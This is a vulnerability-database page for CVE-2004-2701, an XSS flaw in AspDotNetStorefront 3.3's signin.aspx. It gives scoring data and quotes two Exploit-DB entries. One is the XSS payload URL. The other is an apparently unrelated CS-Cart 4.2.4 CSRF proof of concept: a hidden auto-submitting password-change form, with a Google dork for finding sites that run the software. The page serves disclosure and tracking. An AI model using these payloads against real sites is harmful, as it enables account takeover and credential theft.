CVE-2004-2701
published 2004-12-31CVE-2004-2701: Cross-site scripting (XSS) vulnerability in signin.aspx for AspDotNetStorefront 3.3 allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.51%
71.2th percentile
Cross-site scripting (XSS) vulnerability in signin.aspx for AspDotNetStorefront 3.3 allows remote attackers to inject arbitrary web script or HTML via the returnurl parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aspdotnetstorefront | aspdotnetstorefront | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CS-Cart 4.2.4 - Cross-Site Request Forgery
exploitdb·2015-03-11
CVE-2015-2701 CS-Cart 4.2.4 - Cross-Site Request Forgery
CS-Cart 4.2.4 - Cross-Site Request Forgery
---
# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]
Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.
Exploit pasted below and attached.
CS-CART CSRF 0day Exploit
/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
document.getElementById("CSRF").submit();
Luis Santana - Security+
Administrator - http:/
Exploit-DB
AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting
exploitdb·2004-06-09
CVE-2004-2701 AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting
AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/10507/info
AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks.
AspDotNetStorefront 3.3 is reportedly affected by this issue, however, it is possible that other versions are affected as well.
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style=
"background:url(javascript:alert('Vulnerable_To_XSS'))"%20"
http://www.example.com/aspdotnetcart/admin/signin.aspx?retu
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2004-06/0129.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2004-06/0229.htmlhttp://secunia.com/advisories/11839http://www.securityfocus.com/bid/10507https://exchange.xforce.ibmcloud.com/vulnerabilities/16426http://archives.neohapsis.com/archives/bugtraq/2004-06/0129.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2004-06/0229.htmlhttp://secunia.com/advisories/11839http://www.securityfocus.com/bid/10507https://exchange.xforce.ibmcloud.com/vulnerabilities/16426
2004-12-31
Published